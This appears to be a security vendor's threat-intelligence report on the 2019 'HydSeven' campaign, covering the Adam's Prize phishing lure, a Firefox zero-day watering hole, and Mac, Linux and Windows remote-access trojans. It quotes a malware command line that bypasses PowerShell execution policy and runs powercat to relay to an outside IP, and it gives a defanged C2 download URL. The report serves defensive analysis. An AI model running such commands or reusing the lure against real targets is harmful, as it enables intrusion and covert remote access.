The research team at Prevailion has detected and analyzed Linux and Windows remote-access trojans associated with the advanced threat actor known as “HydSeven.” This threat group initially maintained a relatively low profile through the use of bespoke commodity malware. However, they caught the attention of the information security community when performing a highly targeted spear-phishing operation in the summer of 2019.
In this campaign, which we have dubbed “Operation BlockChain Gang,” the threat actors used compromised Cambridge University infrastructure to phish and water-hole their targets. In analyzing the campaign, Prevailion has associated two new malware families to this group. In addition to the previously known Mac OS X agent, we’ve recently analyzed the Windows and Linux variants.
By illustrating how potential victims could have been infected by the group and detailing the capabilities of the malware, this report is intended to inform at-risk organizations and help them understand appropriate steps to avoid compromise.
HydSeven appears to add a new twist to a common method of infection via email, known as “phishing.” While this particular technique is not new, victims rarely report actual interactions with threat actors. In this case, the threat actors crafted an innocuous email asking if the target would be willing to look over some applications for an award presumably in their area of expertise. In a statement about the attack, CoinBase reported, “We learned that over 200 individuals were targeted by this attacker.”
It wasn’t until after the victim responded, indicating that they would be willing to help, that they were sent the malicious link. That link would bring the victim to a threat actor-controlled “watering-hole” hostname on the Cambridge University domain. If someone visited this website from a Firefox browser, their host machine would be exploited by what was a 0-day exploit, later identified as CVE-2019-11707 and CVE-2019-11708. However, the actors did appear to make one small mistake at first; they did not add a message saying that the webpage could only be rendered in Firefox. Thus, some potential victims were saved from compromise simply because they used their default browser. If someone was unfortunate enough to have visited the website using Firefox, they would have been exploited, and an agent would have been deployed to their workstation.
While other researchers have previously documented the functionality of the Mac OS X payload, Prevailion has, with moderate confidence, associated a Windows and Linux component to this threat actor. We speculate that the threat actors likely did not go through the effort to obtain certificates for Mac OS X and Linux payloads, as those systems are less likely to have antivirus software running on them. These payloads were fully functional remote-access tools that allowed the threat actors to run commands, as well as send and receive data from their command and control servers (C2s).
This case study shows the lengths these advanced actors would go to establish access in a high-value network. Based off that same CoinBase report, it was calculated that only 2.5% of people who received the initial email received that final link. This would suggest that the threat actors expended all this effort to gain access to approximately five organizations, potentially in the financial sector.
This report highlights the emphasis that threat actors are placing on organizations that store and retain significant amounts of data about their customer base. We strongly encourage these organizations to assess their existing risk profiles, implement host-based defenses, and put incident response plans in place prior to an event.
According to a presentation given in October 2019 by a Line employee, potential victims of this campaign received a targeted email from a compromised Cambridge account asking them to “assess the quality of competing projects … for the [Cambridge University] Adam’s Prize.” The Adam’s Prize is a highly respected contest, held every year by Cambridge and awarded to a person, or persons, who contributed original research to a given discipline, typically within the field of mathematics.
The initial email appeared innocuous at first glance, asking recipients if they would be willing to help evaluate applications for the Adam’s award. These threat actors even went through the process of creating a LinkedIn account for the persona that sent the emails. While creating a fake profile has become typical of targeted attacks, corresponding with the victims was highly abnormal. In this particular case, correspondence went back and forth — with victims inquiring about requirements and terms of participation — but the link to the water-holed hostname was still not sent until the victim agreed to help.This unique tactic reveals that the threat actors are expanding the social engineering aspect and displaying a level of audacity far beyond the norm
The email contained a link with a unique username and password for the victim. The webpage seemed innocuous, with only one suspicious aspect: a message indicating that the page would only work when viewed in Firefox with a link to download the latest version. We speculate that the actors added this particular message after reading an article such as this one, by Robert Heaton. When Heaton visited the water-holed site, he did not get the Firefox prompt. In his words:
if “Gregory” had added just 7 extra words to this page –
“THIS PAGE MUST BE VIEWED IN FIREFOX” – I would have been screwed.
Around the same time, May 20, 2019, CoinBase experienced a similar attack. This was first reported by @SecurityGuyPhil, in a series of tweets. Those tweets were later turned into a medium post, which can be found here.
“So all in all this looks like a bug collision (not a 1day constructed from the bugfix, not a leak from any of the bug trackers). My guess is that someone was looking for that bug pattern or even specifically for a variant of CVE-2019- and found the bug that way”
Once the exploit was run, the code would obtain the first-stage agent from the C2 server, located at hxxp://185[.]162[.]131[.]96/i/IconServicesAgent. This agent was analyzed extensively in a series of blog posts by Digita Security, in which it was identified as a variant of “NetWire.” A commercially available “systems administration tool”, NetWire can be purchased online at a rate of $120 per year. Despite its low cost, cracked versions of this software are also available to download for free on the internet.
Of note, while NetWire is commercially available, the sample had a low detection rate when originally submitted to VirusTotal on June 2, 2019. At that time, it was flagged as malicious by only one vendor. Since then, though, several companies have created signatures for this tool. In the course of our investigation, we identified two new samples associated with this group. Interestingly, one was named “fuck_tencent” — potentially a reference the Chinese conglomerate Tencent Holdings Ltd.
Once installed on the victim machine, the application masqueraded as the “Finder” application. It then attempted to gather host-based credentials and establish persistence. After gathering host-based information and presumably determining that the environment was of interest, it would install the second, more robust payload, later identified as “Ekoms”. Digita Security performed an extensive write-up on this sample, as well, which can be found here.
Like most second-stage remote-access trojans, it would allow the threat actor to deploy keyloggers, grab screenshots, transfer files, and send audio captures. As with the previous tool, when this sample was submitted to VirusTotal, it was not flagged as malicious by any AV vendors. Initial detection rate for the Ekom sample was 0/53 when uploaded on June 20, 2019
During our investigation, the Prevailion team found three elf files designed for Linux-based operating systems. Like most of the Mac samples, when the file was initially uploaded to VirusTotal, it had a detection rate of zero. And, even as of November 10, it’s only being detected by three vendors.
Initial detection rate of 0/53 for the Linux agent uploaded on March 29th, 2019
The first agent we analyzed was a fully functional remote-access trojan designed for Red-Hat Linux. We hypothesize that the infection mechanism was similar to the one used to deploy the MacOS agent. Once the agent was sent to the machine, it would install itself as a desktop application.
Screenshot of the RC4 embedded within the sample
As in the aforementioned Mac samples, it contained the same RC4 encryption key, used to decrypt a section of code containing the C2 IP address, Host-ID, and Default Group that would be set by the threat actor.
Decrypted output of the encrypted code
When we analyzed this agent, it would gather the machine’s current IP address by making a request to checkip[.]dyndns[.]org. The agent had the ability to gather information about the victim machine and send various commands. Some examples include retrieving:
The agent would persist by auto-starting on login. The functionality suggested its primary purpose was to act as a proxy, or relay, to send commands and data from the threat actors outside the network to other agents within the network. One particular aspect of the agent was the use of a hard-coded user-agent string:
“Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko”
This was of particular note, as the agent was designed for Linux, but this was the typical user-agent string for a Windows operating system version 8.1 or Server 2012.
While the previous case studies provided insights into how the threat actor performed in the MacOS environment, looking at those same C2, we identified another campaign from earlier this year. The two IP addresses referenced in the CoinBase targeting were:
Vitali Kremez, @VK_Intel, later noted that he found a signed Windows binary, with the certificate being issued to “SANJ CONSULTING LTD”. Once the binary was analyzed, it communicated with the same C2 as the MacOS malware from the CoinBase attack.
“cmd.exe /c powershell; Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force;. “%s”; powercat -l -p 4000 -r tcp:18.104.22.168:443;
This binary was a compiled version of PowerCat, an open-source framework project written in PowerShell. We have associated additional PowerCat samples with the same threat group. However, they were not signed by a certificate authority. To avoid detection from common strings, they usedan obfuscator such as “Invoke-Obfuscation”. PowerCat is a fully functional remote-access trojan that:
Another notable feature of these agents was their ability to act as a relay. This is significant because once the threat actors have access to a relay on the network behind the firewall, there are typically few, if any, appliances in place to detect the lateral movement of the actor. These relay agents allow the threat actors to access more sensitive data hosted on servers that are only accessible once a client has been authenticated and permitted into the local network.
One other significant element was the use of a common RC4 key across the Windows, Linux, and Mac-based samples. The use of this shared RC4 key and overlapping C2s led us to believe, with moderate confidence, that all these samples can be associated to the same threat actor. This threat actor group has previously been reported upon as being active in both Japan and Poland.
This threat actor has showcased a number of techniques that would categorize them as an extremely advanced adversary. This campaign highlights the focus on large organizations that store and retain significant amounts of data about their customer base.
While there is currently no single solution to protect every system with 100% fidelity, these products can significantly reduce risk by displaying a pop-up to alert the end user about activity in the background of their system. This gives them a greater opportunity to at least detect abnormalities and potentially avoid a breach.
Organizations should also work on preparing and rehearsing their incident response plans. Thus, if an event does occur, they will have an established procedure regarding who to contact and what to do. Furthermore, in an incident response investigation, it is critical to check the entire network, not just the machines where an alert was detected. This includes Linux-based workstations and servers, as these systems sometimes get overlooked. If you feel that your Linux-based system may have been compromised, guidelines on how to inspect that system can be found here.
While it’s important to have a security team on staff, the end user is always your first line of defense to detect suspicious activity. For example, if someone receives an email asking them to evaluate an international award in economics, and they are not an economist, they should consult their network security staff. If you have host-based firewalls in place and a user suddenly starts seeing a pop-up message about a cURL command connecting to a server in Hong Kong, there may be an issue at hand. Training your employees to take these alerts seriously could prevent a major incident from occurring.
The following is a list of samples that have been associated with this threat group. This list was comprised from information from Prevailion employees and the open source community.
Read some thoughts from our CTO, Nate Warfield, who discusses the escalating attacks on critical infrastructure with other cybersecurity experts in this Industrial Week roundtable.
by Will Gragido, Chief Strategy Officer – Prevailion, Inc. Intelligence analysis is dependent upon many things not the least of which are collections and access to data (e.g., pcaps, logs etc.) sourced from within the network. Prevailion affords its customers the ability to view intelligence related to real state of compromise outside the network’s perimeter. […]